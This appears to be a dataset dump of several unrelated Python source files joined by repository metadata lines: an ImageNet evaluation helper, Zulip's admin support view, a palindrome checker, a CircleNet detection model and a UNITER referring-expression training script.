Args:
ckpt_dir: str. Checkpoint directory path.
image_files: List[str]. A list of image file paths.
labels_map_file: str. The labels map file path.
enable_ema: enable expotential moving average.
export_ckpt: export ckpt folder.
Returns:
A tuple (pred_idx, and pred_prob), where pred_idx is the top 5 prediction
index and pred_prob is the top 5 prediction probability.
"""
classes = json.loads(tf.gfile.Open(labels_map_file).read())
pred_idx, pred_prob = self.run_inference(
ckpt_dir, image_files, [0] * len(image_files), enable_ema, export_ckpt)
for i in range(len(image_files)):
print('predicted class for image {}: '.format(image_files[i]))
for j, idx in enumerate(pred_idx[i]):
print(' -> top_{} ({:4.2f}%): {} '.format(j, pred_prob[i][j] * 100,
classes[str(idx)]))
return pred_idx, pred_prob
def eval_imagenet(self, ckpt_dir, imagenet_eval_glob,
imagenet_eval_label, num_images, enable_ema, export_ckpt):
"""Eval ImageNet images and report top1/top5 accuracy.
Args:
ckpt_dir: str. Checkpoint directory path.
imagenet_eval_glob: str. File path glob for all eval images.
imagenet_eval_label: str. File path for eval label.
num_images: int. Number of images to eval: -1 means eval the whole
dataset.
enable_ema: enable expotential moving average.
export_ckpt: export checkpoint folder.
Returns:
A tuple (top1, top5) for top1 and top5 accuracy.
"""
imagenet_val_labels = [int(i) for i in tf.gfile.GFile(imagenet_eval_label)]
imagenet_filenames = sorted(tf.gfile.Glob(imagenet_eval_glob))
if num_images < 0:
num_images = len(imagenet_filenames)
image_files = imagenet_filenames[:num_images]
labels = imagenet_val_labels[:num_images]
pred_idx, _ = self.run_inference(
ckpt_dir, image_files, labels, enable_ema, export_ckpt)
top1_cnt, top5_cnt = 0.0, 0.0
for i, label in enumerate(labels):
top1_cnt += label in pred_idx[i][:1]
top5_cnt += label in pred_idx[i][:5]
if i % 100 == 0:
print('Step {}: top1_acc = {:4.2f}% top5_acc = {:4.2f}%'.format(
i, 100 * top1_cnt / (i + 1), 100 * top5_cnt / (i + 1)))
sys.stdout.flush()
top1, top5 = 100 * top1_cnt / num_images, 100 * top5_cnt / num_images
print('Final: top1_acc = {:4.2f}% top5_acc = {:4.2f}%'.format(top1, top5))
return top1, top5 | 38.861809 | 80 | 0.675309 |
9d89c7090a871e77c04906fb87c88929e1d0abc0 | 13,671 | py | Python | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | 1 | 2020-03-29T19:54:13.000Z | 2020-03-29T19:54:13.000Z | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | null | null | null | analytics/views/support.py | BillyMagarali/zulip | 9406c21340b6810c58388020c562d475b1e25b2e | [
"Apache-2.0"
] | 1 | 2021-01-13T03:14:57.000Z | 2021-01-13T03:14:57.000Z | import urllib
from datetime import timedelta
from decimal import Decimal
from typing import Any, Dict, List, Optional
from urllib.parse import urlencode
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.utils.timesince import timesince
from django.utils.timezone import now as timezone_now
from django.utils.translation import gettext as _
from confirmation.models import Confirmation, _properties, confirmation_url
from confirmation.settings import STATUS_ACTIVE
from zerver.decorator import require_server_admin
from zerver.forms import check_subdomain_available
from zerver.lib.actions import (
do_change_plan_type,
do_change_realm_subdomain,
do_deactivate_realm,
do_scrub_realm,
do_send_realm_reactivation_email,
)
from zerver.lib.exceptions import JsonableError
from zerver.lib.realm_icon import realm_icon_url
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.subdomains import get_subdomain_from_hostname
from zerver.lib.validator import check_bool, check_string_in, to_decimal, to_non_negative_int
from zerver.models import (
MultiuseInvite,
PreregistrationUser,
Realm,
UserProfile,
get_org_type_display_name,
get_realm,
)
from zerver.views.invite import get_invitee_emails_set
if settings.BILLING_ENABLED:
from corporate.lib.stripe import approve_sponsorship as do_approve_sponsorship
from corporate.lib.stripe import (
attach_discount_to_realm,
downgrade_at_the_end_of_billing_cycle,
downgrade_now_without_creating_additional_invoices,
get_discount_for_realm,
get_latest_seat_count,
make_end_of_cycle_updates_if_needed,
update_billing_method_of_current_plan,
update_sponsorship_status,
void_all_open_invoices,
)
from corporate.models import get_current_plan_by_realm, get_customer_by_realm
def get_plan_name(plan_type: int) -> str:
return ["", "self hosted", "limited", "standard", "open source"][plan_type]
def get_confirmations(
types: List[int], object_ids: List[int], hostname: Optional[str] = None
) -> List[Dict[str, Any]]:
lowest_datetime = timezone_now() - timedelta(days=30)
confirmations = Confirmation.objects.filter(
type__in=types, object_id__in=object_ids, date_sent__gte=lowest_datetime
)
confirmation_dicts = []
for confirmation in confirmations:
realm = confirmation.realm
content_object = confirmation.content_object
type = confirmation.type
days_to_activate = _properties[type].validity_in_days
expiry_date = confirmation.date_sent + timedelta(days=days_to_activate)
assert content_object is not None
if hasattr(content_object, "status"):
if content_object.status == STATUS_ACTIVE:
link_status = "Link has been clicked"
else:
link_status = "Link has never been clicked"
else:
link_status = ""
now = timezone_now()
if now < expiry_date:
expires_in = timesince(now, expiry_date)
else:
expires_in = "Expired"
url = confirmation_url(confirmation.confirmation_key, realm, type)
confirmation_dicts.append(
{
"object": confirmation.content_object,
"url": url,
"type": type,
"link_status": link_status,
"expires_in": expires_in,
}
)
return confirmation_dicts
VALID_DOWNGRADE_METHODS = [
"downgrade_at_billing_cycle_end",
"downgrade_now_without_additional_licenses",
"downgrade_now_void_open_invoices",
]
VALID_STATUS_VALUES = [
"active",
"deactivated",
]
VALID_BILLING_METHODS = [
"send_invoice",
"charge_automatically",
]
@require_server_admin
@has_request_variables
def support(
request: HttpRequest,
realm_id: Optional[int] = REQ(default=None, converter=to_non_negative_int),
plan_type: Optional[int] = REQ(default=None, converter=to_non_negative_int),
discount: Optional[Decimal] = REQ(default=None, converter=to_decimal),
new_subdomain: Optional[str] = REQ(default=None),
status: Optional[str] = REQ(default=None, str_validator=check_string_in(VALID_STATUS_VALUES)),
billing_method: Optional[str] = REQ(
default=None, str_validator=check_string_in(VALID_BILLING_METHODS)
),
sponsorship_pending: Optional[bool] = REQ(default=None, json_validator=check_bool),
approve_sponsorship: Optional[bool] = REQ(default=None, json_validator=check_bool),
downgrade_method: Optional[str] = REQ(
default=None, str_validator=check_string_in(VALID_DOWNGRADE_METHODS)
),
scrub_realm: Optional[bool] = REQ(default=None, json_validator=check_bool),
query: Optional[str] = REQ("q", default=None),
) -> HttpResponse:
context: Dict[str, Any] = {}
if "success_message" in request.session:
context["success_message"] = request.session["success_message"]
del request.session["success_message"]
if settings.BILLING_ENABLED and request.method == "POST":
# We check that request.POST only has two keys in it: The
# realm_id and a field to change.
keys = set(request.POST.keys())
if "csrfmiddlewaretoken" in keys:
keys.remove("csrfmiddlewaretoken")
if len(keys) != 2:
raise JsonableError(_("Invalid parameters"))
realm = Realm.objects.get(id=realm_id)
acting_user = request.user
assert isinstance(acting_user, UserProfile)
if plan_type is not None:
current_plan_type = realm.plan_type
do_change_plan_type(realm, plan_type, acting_user=acting_user)
msg = f"Plan type of {realm.string_id} changed from {get_plan_name(current_plan_type)} to {get_plan_name(plan_type)} "
context["success_message"] = msg
elif discount is not None:
current_discount = get_discount_for_realm(realm) or 0
attach_discount_to_realm(realm, discount, acting_user=acting_user)
context[
"success_message"
] = f"Discount of {realm.string_id} changed to {discount}% from {current_discount}%."
elif new_subdomain is not None:
old_subdomain = realm.string_id
try:
check_subdomain_available(new_subdomain)
except ValidationError as error:
context["error_message"] = error.message
else:
do_change_realm_subdomain(realm, new_subdomain, acting_user=acting_user)
request.session[
"success_message"
] = f"Subdomain changed from {old_subdomain} to {new_subdomain}"
return HttpResponseRedirect(
reverse("support") + "?" + urlencode({"q": new_subdomain})
)
elif status is not None:
if status == "active":
do_send_realm_reactivation_email(realm, acting_user=acting_user)
context[
"success_message"
] = f"Realm reactivation email sent to admins of {realm.string_id}."
elif status == "deactivated":
do_deactivate_realm(realm, acting_user=acting_user)
context["success_message"] = f"{realm.string_id} deactivated."
elif billing_method is not None:
if billing_method == "send_invoice":
update_billing_method_of_current_plan(
realm, charge_automatically=False, acting_user=acting_user
)
context[
"success_message"
] = f"Billing method of {realm.string_id} updated to pay by invoice."
elif billing_method == "charge_automatically":
update_billing_method_of_current_plan(
realm, charge_automatically=True, acting_user=acting_user
)
context[
"success_message"
] = f"Billing method of {realm.string_id} updated to charge automatically."
elif sponsorship_pending is not None:
if sponsorship_pending:
update_sponsorship_status(realm, True, acting_user=acting_user)
context["success_message"] = f"{realm.string_id} marked as pending sponsorship."
else:
update_sponsorship_status(realm, False, acting_user=acting_user)
context["success_message"] = f"{realm.string_id} is no longer pending sponsorship."
elif approve_sponsorship:
do_approve_sponsorship(realm, acting_user=acting_user)
context["success_message"] = f"Sponsorship approved for {realm.string_id}"
elif downgrade_method is not None:
if downgrade_method == "downgrade_at_billing_cycle_end":
downgrade_at_the_end_of_billing_cycle(realm)
context[
"success_message"
] = f"{realm.string_id} marked for downgrade at the end of billing cycle"
elif downgrade_method == "downgrade_now_without_additional_licenses":
downgrade_now_without_creating_additional_invoices(realm)
context[
"success_message"
] = f"{realm.string_id} downgraded without creating additional invoices"
elif downgrade_method == "downgrade_now_void_open_invoices":
downgrade_now_without_creating_additional_invoices(realm)
voided_invoices_count = void_all_open_invoices(realm)
context[
"success_message"
] = f"{realm.string_id} downgraded and voided {voided_invoices_count} open invoices"
elif scrub_realm:
do_scrub_realm(realm, acting_user=acting_user)
context["success_message"] = f"{realm.string_id} scrubbed."
if query:
key_words = get_invitee_emails_set(query)
users = set(UserProfile.objects.filter(delivery_email__in=key_words))
realms = set(Realm.objects.filter(string_id__in=key_words))
for key_word in key_words:
try:
URLValidator()(key_word)
parse_result = urllib.parse.urlparse(key_word)
hostname = parse_result.hostname
assert hostname is not None
if parse_result.port:
hostname = f"{hostname}:{parse_result.port}"
subdomain = get_subdomain_from_hostname(hostname)
try:
realms.add(get_realm(subdomain))
except Realm.DoesNotExist:
pass
except ValidationError:
users.update(UserProfile.objects.filter(full_name__iexact=key_word))
for realm in realms:
realm.customer = get_customer_by_realm(realm)
current_plan = get_current_plan_by_realm(realm)
if current_plan is not None:
new_plan, last_ledger_entry = make_end_of_cycle_updates_if_needed(
current_plan, timezone_now()
)
if last_ledger_entry is not None:
if new_plan is not None:
realm.current_plan = new_plan
else:
realm.current_plan = current_plan
realm.current_plan.licenses = last_ledger_entry.licenses
realm.current_plan.licenses_used = get_latest_seat_count(realm)
# full_names can have , in them
users.update(UserProfile.objects.filter(full_name__iexact=query))
context["users"] = users
context["realms"] = realms
confirmations: List[Dict[str, Any]] = []
preregistration_users = PreregistrationUser.objects.filter(email__in=key_words)
confirmations += get_confirmations(
[Confirmation.USER_REGISTRATION, Confirmation.INVITATION, Confirmation.REALM_CREATION],
preregistration_users,
hostname=request.get_host(),
)
multiuse_invites = MultiuseInvite.objects.filter(realm__in=realms)
confirmations += get_confirmations([Confirmation.MULTIUSE_INVITE], multiuse_invites)
confirmations += get_confirmations(
[Confirmation.REALM_REACTIVATION], [realm.id for realm in realms]
)
context["confirmations"] = confirmations
def get_realm_owner_emails_as_string(realm: Realm) -> str:
return ", ".join(
realm.get_human_owner_users()
.order_by("delivery_email")
.values_list("delivery_email", flat=True)
)
def get_realm_admin_emails_as_string(realm: Realm) -> str:
return ", ".join(
realm.get_human_admin_users(include_realm_owners=False)
.order_by("delivery_email")
.values_list("delivery_email", flat=True)
)
context["get_realm_owner_emails_as_string"] = get_realm_owner_emails_as_string
context["get_realm_admin_emails_as_string"] = get_realm_admin_emails_as_string
context["get_discount_for_realm"] = get_discount_for_realm
context["get_org_type_display_name"] = get_org_type_display_name
context["realm_icon_url"] = realm_icon_url
context["Confirmation"] = Confirmation
return render(request, "analytics/support.html", context=context)
| 41.935583 | 130 | 0.663448 |
d021a27ad5495fdcda5443b56b4683ac6ba7c923 | 1,148 | py | Python | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5-- | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | 4 | 2018-12-02T14:21:02.000Z | 2019-02-28T04:15:42.000Z | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5 | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | 25 | 2018-11-27T10:00:05.000Z | 2018-12-11T01:58:46.000Z | other/palindrome.py | 18-2-SKKU-OSS/2018-2-OSS-E5-- | 8bb7e4c239f5bd95f4635b442bb8b2838e76fb36 | [
"MIT"
] | null | null | null | """
Palindrome : 회문으로, 앞에서부터 읽으나 뒤에서부터 읽으나 동일한 단어나 구를 의미한다.
이 코드에서 문자열을 입력받으면 그 문자열이 Palindrome 인지 아닌지를 테스트한다.
"""
# 인자로 받은 문자열이 회문인지 아닌지를 검사
def is_palindrome(str):
start_i = 0
end_i = len(str) - 1
while start_i < end_i: # 증가하는 앞부분과 감소하는 뒷부분의 크기가 반전이 되면 회문의 발견.
if str[start_i] == str[end_i]: # 현 시작점과 현 마지막점의 문자가 같으면 반복 계속,
start_i += 1
end_i -= 1
else:
return False # 한번이라도 다른 문자끼리 비교가 된다면 회문 탐색 실패.
return True # 그렇지 않은 경우 참 반환
# 재귀를 통한 구현
def recursive_palindrome(str):
if len(str) <= 1: # base 조건, 즉 인자의 길이가 1이 되면, 원래 문자열의 중간부분까지 탐색이 완료되었다는 것이므로
return True # 회문의 발견. 즉 참 반환
if str[0] == str[len(str) - 1]: # 재귀 조건, 인자의 첫 문자와 마지막 문자가 같으면,
return recursive_palindrome(str[1:-1]) # 그 두문자를 빼 다음 재귀함수의 인자로 전달.
else:
return False # 인자의 첫 문자와 마지막 문자가 다르면, 회문 탐색 실패, 거짓 반환
def main():
str = 'ama'
print(recursive_palindrome(str.lower()))
print(is_palindrome(str.lower()))
if __name__ == '__main__':
main()
| 31.888889 | 99 | 0.541812 |
797130522e525a58e85e7b3f848947aed4b21310 | 2,150 | py | Python | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | detro/packages/circledet/network.py | Peiiii/detro | 26d74468d7554dc20b2a2daf7ec5009302c820f2 | [
"MIT"
] | null | null | null | from .resnet_backbone import resnet18
from torch import nn
import torch
import torch.nn.functional as F
from detro.networks.components import BiFPN, Center_layer, Offset_layer, Reg_layer, Heatmap_layer
from detro.networks.losslib import center_loss, distance_loss
class FeatureFusionNetwork(nn.Module):
def __init__(self):
super().__init__()
def forward(self, inputs):
resized = []
size = inputs[0].size()[-2:]
for x in inputs[1:]:
resized.append(F.upsample(x, size))
x = torch.cat(resized, dim=1)
return x
class CircleNet(nn.Module):
def __init__(self, num_classes=1):
super().__init__()
self.backbone = resnet18(pretrained=True)
self.neck = FeatureFusionNetwork()
self.conv1 = nn.Conv2d(896, 256, kernel_size=1, stride=1, padding=0)
self.bn1 = nn.BatchNorm2d(256)
self.relu = nn.ReLU(inplace=True)
# self.center_layer = Heatmap_layer(in_channels=256, out_channels=num_classes)
# self.reg_layer = Heatmap_layer(in_channels=256, out_channels=1)
self.hm_layer = Heatmap_layer(in_channels=256, out_channels=num_classes + 1)
def forward(self, inputs):
c1, c2, c3, c4, c5 = self.backbone(inputs)
features = [c2, c3, c4, c5]
features = self.neck(features)
x = features
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
# center_heatmap = self.center_layer(x)
# offsets = self.reg_layer(x)
x=self.hm_layer(x)
center_heatmap=x[:,:-1]
offsets=x[:,-1:]
return dict(
center_heatmap=center_heatmap, offsets=offsets
)
def CircleDetCriterion(preds, labels):
loss_center = center_loss(preds['center_heatmap'], labels['center_heatmap'])
# loss_corner=center_loss(preds['corner_heatmap'],labels['corner_heatmap'])
loss_offsets = distance_loss(preds['offsets'], labels['offsets'], labels['offsets_mask'])
return dict(
loss=loss_center + loss_offsets,
loss_center=loss_center,
# loss_corner=loss_corner,
loss_offsets=loss_offsets,
)
| 33.59375 | 97 | 0.649767 |
b7c25049691eff112fc8f67645c526e58953697f | 18,420 | py | Python | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 612 | 2020-01-28T00:34:23.000Z | 2022-03-31T00:40:06.000Z | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 90 | 2020-02-18T10:54:40.000Z | 2022-03-17T07:36:35.000Z | train_re.py | carboncoo/UNITER | dfe007c2cea55430a847fd1cf318e88ae8ffe88f | [
"MIT"
] | 114 | 2020-01-31T03:03:25.000Z | 2022-03-17T15:53:51.000Z | """
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
UNITER finetuning for RE
"""
import argparse
import json
import os
from os.path import exists, join
from time import time
import torch
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from torch.optim import Adam, Adamax
from apex import amp
from horovod import torch as hvd
from tqdm import tqdm
from data import (PrefetchLoader, DetectFeatLmdb,
ReTxtTokLmdb, ReDataset, ReEvalDataset,
re_collate, re_eval_collate)
from data.sampler import DistributedSampler
from model.re import UniterForReferringExpressionComprehension
from optim import AdamW, get_lr_sched
from utils.logger import LOGGER, TB_LOGGER, RunningMeter, add_log_to_file
from utils.distributed import (
all_gather_list, all_reduce_and_rescale_tensors,
broadcast_tensors)
from utils.save import ModelSaver, save_training_meta
from utils.misc import (
NoOp, parse_with_config, set_dropout, set_random_seed)
from utils.const import IMG_DIM
def create_dataloader(img_path, txt_path, batch_size, is_train,
dset_cls, collate_fn, opts):
img_db_type = "gt" if "coco_gt" in img_path else "det"
conf_th = -1 if img_db_type == "gt" else opts.conf_th
num_bb = 100 if img_db_type == "gt" else opts.num_bb
img_db = DetectFeatLmdb(img_path, conf_th, opts.max_bb, opts.min_bb,
num_bb, opts.compressed_db)
txt_db = ReTxtTokLmdb(txt_path, opts.max_txt_len if is_train else -1)
if is_train:
dset = dset_cls(txt_db, img_db)
else:
dset = dset_cls(txt_db, img_db, use_gt_feat=img_db_type == "gt")
batch_size = (opts.train_batch_size if is_train
else opts.val_batch_size)
sampler = DistributedSampler(dset, num_replicas=hvd.size(),
rank=hvd.rank(), shuffle=False)
dataloader = DataLoader(dset, sampler=sampler,
batch_size=batch_size,
num_workers=opts.n_workers,
pin_memory=opts.pin_mem, collate_fn=collate_fn)
dataloader = PrefetchLoader(dataloader)
return dataloader
def build_optimizer(model, opts):
""" Re linear may get larger learning rate """
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
param_optimizer = [(n, p) for n, p in model.named_parameters()
if 're_output' not in n]
param_top = [(n, p) for n, p in model.named_parameters()
if 're_output' in n]
optimizer_grouped_parameters = [
{'params': [p for n, p in param_top
if not any(nd in n for nd in no_decay)],
'lr': opts.learning_rate,
'weight_decay': opts.weight_decay},
{'params': [p for n, p in param_top
if any(nd in n for nd in no_decay)],
'lr': opts.learning_rate,
'weight_decay': 0.0},
{'params': [p for n, p in param_optimizer
if not any(nd in n for nd in no_decay)],
'weight_decay': opts.weight_decay},
{'params': [p for n, p in param_optimizer
if any(nd in n for nd in no_decay)],
'weight_decay': 0.0}
]
# currently Adam only
if opts.optim == 'adam':
OptimCls = Adam
elif opts.optim == 'adamax':
OptimCls = Adamax
elif opts.optim == 'adamw':
OptimCls = AdamW
else:
raise ValueError('invalid optimizer')
optimizer = OptimCls(optimizer_grouped_parameters,
lr=opts.learning_rate, betas=opts.betas)
return optimizer
def main(opts):
hvd.init()
n_gpu = hvd.size()
device = torch.device("cuda", hvd.local_rank())
torch.cuda.set_device(hvd.local_rank())
rank = hvd.rank()
opts.rank = rank
LOGGER.info("device: {} n_gpu: {}, rank: {}, "
"16-bits training: {}".format(
device, n_gpu, hvd.rank(), opts.fp16))
if opts.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, "
"should be >= 1".format(
opts.gradient_accumulation_steps))
set_random_seed(opts.seed)
# train_examples = None
LOGGER.info(f"Loading Train Dataset {opts.train_txt_db}, "
f"{opts.train_img_db}")
train_dataloader = create_dataloader(opts.train_img_db, opts.train_txt_db,
opts.train_batch_size, True,
ReDataset, re_collate, opts)
val_dataloader = create_dataloader(opts.val_img_db, opts.val_txt_db,
opts.val_batch_size, False,
ReEvalDataset, re_eval_collate, opts)
# Prepare model
if opts.checkpoint:
checkpoint = torch.load(opts.checkpoint)
else:
checkpoint = {}
all_dbs = [opts.train_txt_db, opts.val_txt_db]
toker = json.load(open(f'{all_dbs[0]}/meta.json'))['toker']
assert all(toker == json.load(open(f'{db}/meta.json'))['toker']
for db in all_dbs)
model = UniterForReferringExpressionComprehension.from_pretrained(
opts.model_config, checkpoint,
img_dim=IMG_DIM, loss=opts.train_loss,
margin=opts.margin,
hard_ratio=opts.hard_ratio, mlp=opts.mlp,)
model.to(device)
model.train()
# make sure every process has same model parameters in the beginning
broadcast_tensors([p.data for p in model.parameters()], 0)
set_dropout(model, opts.dropout)
optimizer = build_optimizer(model, opts)
# Apex
model, optimizer = amp.initialize(
model, optimizer, enabled=opts.fp16, opt_level='O2')
global_step = 0
if rank == 0:
save_training_meta(opts)
TB_LOGGER.create(join(opts.output_dir, 'log'))
pbar = tqdm(total=opts.num_train_steps)
model_saver = ModelSaver(join(opts.output_dir, 'ckpt'), 'model_epoch')
os.makedirs(join(opts.output_dir, 'results')) # store RE predictions
add_log_to_file(join(opts.output_dir, 'log', 'log.txt'))
else:
LOGGER.disabled = True
pbar = NoOp()
model_saver = NoOp()
LOGGER.info(f"***** Running training with {n_gpu} GPUs *****")
LOGGER.info(" Num examples = %d", len(train_dataloader.dataset))
LOGGER.info(" Batch size = %d", opts.train_batch_size)
LOGGER.info(" Accumulate steps = %d", opts.gradient_accumulation_steps)
LOGGER.info(" Num steps = %d", opts.num_train_steps)
running_loss = RunningMeter('loss')
model.train()
n_examples = 0
n_epoch = 0
best_val_acc, best_epoch = None, None
start = time()
# quick hack for amp delay_unscale bug
optimizer.zero_grad()
if global_step == 0:
optimizer.step()
while True:
for step, batch in enumerate(train_dataloader):
if global_step >= opts.num_train_steps:
break
n_examples += batch['input_ids'].size(0)
loss = model(batch, compute_loss=True)
loss = loss.sum() # sum over vectorized loss TODO: investigate
delay_unscale = (step+1) % opts.gradient_accumulation_steps != 0
with amp.scale_loss(
loss, optimizer, delay_unscale=delay_unscale
) as scaled_loss:
scaled_loss.backward()
if not delay_unscale:
# gather gradients from every processes
# do this before unscaling to make sure every process uses
# the same gradient scale
grads = [p.grad.data for p in model.parameters()
if p.requires_grad and p.grad is not None]
all_reduce_and_rescale_tensors(grads, float(1))
running_loss(loss.item())
if (step + 1) % opts.gradient_accumulation_steps == 0:
global_step += 1
# learning rate scheduling
lr_this_step = get_lr_sched(global_step, opts)
for i, param_group in enumerate(optimizer.param_groups):
if i == 0 or i == 1:
param_group['lr'] = lr_this_step * opts.lr_mul
elif i == 2 or i == 3:
param_group['lr'] = lr_this_step
else:
raise ValueError()
TB_LOGGER.add_scalar('lr', lr_this_step, global_step)
# log loss
# NOTE: not gathered across GPUs for efficiency
TB_LOGGER.add_scalar('loss', running_loss.val, global_step)
TB_LOGGER.step()
# update model params
if opts.grad_norm != -1:
grad_norm = clip_grad_norm_(amp.master_params(optimizer),
opts.grad_norm)
TB_LOGGER.add_scalar('grad_norm', grad_norm, global_step)
optimizer.step()
optimizer.zero_grad()
pbar.update(1)
if global_step % 100 == 0:
# monitor training throughput
LOGGER.info(f'============Step {global_step}=============')
tot_ex = sum(all_gather_list(n_examples))
ex_per_sec = int(tot_ex / (time()-start))
LOGGER.info(f'{tot_ex} examples trained at '
f'{ex_per_sec} ex/s')
TB_LOGGER.add_scalar('perf/ex_per_s',
ex_per_sec, global_step)
LOGGER.info('===========================================')
# evaluate after each epoch
val_log, _ = validate(model, val_dataloader)
TB_LOGGER.log_scaler_dict(val_log)
# save model
n_epoch += 1
model_saver.save(model, n_epoch)
LOGGER.info(f"finished {n_epoch} epochs")
# save best model
if best_val_acc is None or val_log['valid/acc'] > best_val_acc:
best_val_acc = val_log['valid/acc']
best_epoch = n_epoch
model_saver.save(model, 'best')
# shuffle training data for the next epoch
train_dataloader.loader.dataset.shuffle()
# is training finished?
if global_step >= opts.num_train_steps:
break
val_log, results = validate(model, val_dataloader)
with open(f'{opts.output_dir}/results/'
f'results_{global_step}_'
f'rank{rank}_final.json', 'w') as f:
json.dump(results, f)
TB_LOGGER.log_scaler_dict(val_log)
model_saver.save(model, f'{global_step}_final')
# print best model
LOGGER.info(
f'best_val_acc = {best_val_acc*100:.2f}% at epoch {best_epoch}.')
@torch.no_grad()
def validate(model, val_dataloader):
LOGGER.info("start running evaluation.")
model.eval()
tot_score = 0
n_ex = 0
st = time()
predictions = {}
for i, batch in enumerate(val_dataloader):
# inputs
(tgt_box_list, obj_boxes_list, sent_ids) = (
batch['tgt_box'], batch['obj_boxes'], batch['sent_ids'])
# scores (n, max_num_bb)
scores = model(batch, compute_loss=False)
ixs = torch.argmax(scores, 1).cpu().detach().numpy() # (n, )
# pred_boxes
for ix, obj_boxes, tgt_box, sent_id in \
zip(ixs, obj_boxes_list, tgt_box_list, sent_ids):
pred_box = obj_boxes[ix]
predictions[int(sent_id)] = {
'pred_box': pred_box.tolist(),
'tgt_box': tgt_box.tolist()}
if val_dataloader.loader.dataset.computeIoU(
pred_box, tgt_box) > .5:
tot_score += 1
n_ex += 1
tot_time = time()-st
tot_score = sum(all_gather_list(tot_score))
n_ex = sum(all_gather_list(n_ex))
val_acc = tot_score / n_ex
val_log = {'valid/acc': val_acc, 'valid/ex_per_s': n_ex/tot_time}
model.train()
LOGGER.info(
f"validation ({n_ex} sents) finished in {int(tot_time)} seconds"
f", accuracy: {val_acc*100:.2f}%")
return val_log, predictions
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--train_txt_db",
default=None, type=str,
help="The input train corpus. (LMDB)")
parser.add_argument("--train_img_db",
default=None, type=str,
help="The input train images.")
parser.add_argument("--val_txt_db",
default=None, type=str,
help="The input validation corpus. (LMDB)")
parser.add_argument("--val_img_db",
default=None, type=str,
help="The input validation images.")
parser.add_argument('--compressed_db', action='store_true',
help='use compressed LMDB')
parser.add_argument("--model_config",
default=None, type=str,
help="json file for model architecture")
parser.add_argument("--checkpoint",
default=None, type=str,
help="pretrained model (can take 'google-bert') ")
parser.add_argument("--mlp", default=1, type=int,
help="number of MLP layers for RE output")
parser.add_argument(
"--output_dir", default=None, type=str,
help="The output directory where the model checkpoints will be "
"written.")
# Prepro parameters
parser.add_argument('--max_txt_len', type=int, default=60,
help='max number of tokens in text (BERT BPE)')
parser.add_argument('--conf_th', type=float, default=0.2,
help='threshold for dynamic bounding boxes '
'(-1 for fixed)')
parser.add_argument('--max_bb', type=int, default=100,
help='max number of bounding boxes')
parser.add_argument('--min_bb', type=int, default=10,
help='min number of bounding boxes')
parser.add_argument('--num_bb', type=int, default=36,
help='static number of bounding boxes')
# training parameters
parser.add_argument("--train_batch_size",
default=128, type=int,
help="Total batch size for training. "
"(batch by examples)")
parser.add_argument("--val_batch_size",
default=256, type=int,
help="Total batch size for validation. "
"(batch by examples)")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=16,
help="Number of updates steps to accumualte before "
"performing a backward/update pass.")
parser.add_argument("--train_loss",
default="cls", type=str,
choices=['cls', 'rank'],
help="loss to used during training")
parser.add_argument("--margin",
default=0.2, type=float,
help="margin of ranking loss")
parser.add_argument("--hard_ratio",
default=0.3, type=float,
help="sampling ratio of hard negatives")
parser.add_argument("--learning_rate",
default=3e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_steps",
default=32000,
type=int,
help="Total number of training updates to perform.")
parser.add_argument("--optim", default='adam',
choices=['adam', 'adamax', 'adamw'],
help="optimizer")
parser.add_argument("--betas", default=[0.9, 0.98], nargs='+', type=float,
help="beta for adam optimizer")
parser.add_argument("--decay", default='linear',
choices=['linear', 'invsqrt', 'constant'],
help="learning rate decay method")
parser.add_argument("--dropout",
default=0.1,
type=float,
help="tune dropout regularization")
parser.add_argument("--weight_decay",
default=0.0,
type=float,
help="weight decay (L2) regularization")
parser.add_argument("--grad_norm",
default=0.25,
type=float,
help="gradient clipping (-1 for no clipping)")
parser.add_argument("--warmup_steps",
default=4000,
type=int,
help="Number of training steps to perform linear "
"learning rate warmup for. (invsqrt decay)")
# device parameters
parser.add_argument('--seed',
type=int,
default=24,
help="random seed for initialization")
parser.add_argument('--fp16',
action='store_true',
help="Whether to use 16-bit float precision instead "
"of 32-bit")
parser.add_argument('--n_workers', type=int, default=4,
help="number of data workers")
parser.add_argument('--pin_mem', action='store_true',
help="pin memory")
# can use config files
parser.add_argument('--config', help='JSON config files')
args = parse_with_config(parser)
if exists(args.output_dir) and os.listdir(args.output_dir):
raise ValueError("Output directory ({}) already exists and is not "
"empty.".format(args.output_dir))
if args.conf_th == -1:
assert args.max_bb + args.max_txt_len + 2 <= 512
else:
assert args.num_bb + args.max_txt_len + 2 <= 512
# options safe guard
main(args)
| 40.218341 | 79 | 0.562486 |
a4f469b6e432881fa2bd58668f0c11f0406d4ef9 | 3,706 | py | Python | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | VeriConomy/Verium | c3534ab37a173328a152c1e5c13df83e458d3c24 | [
"MIT"
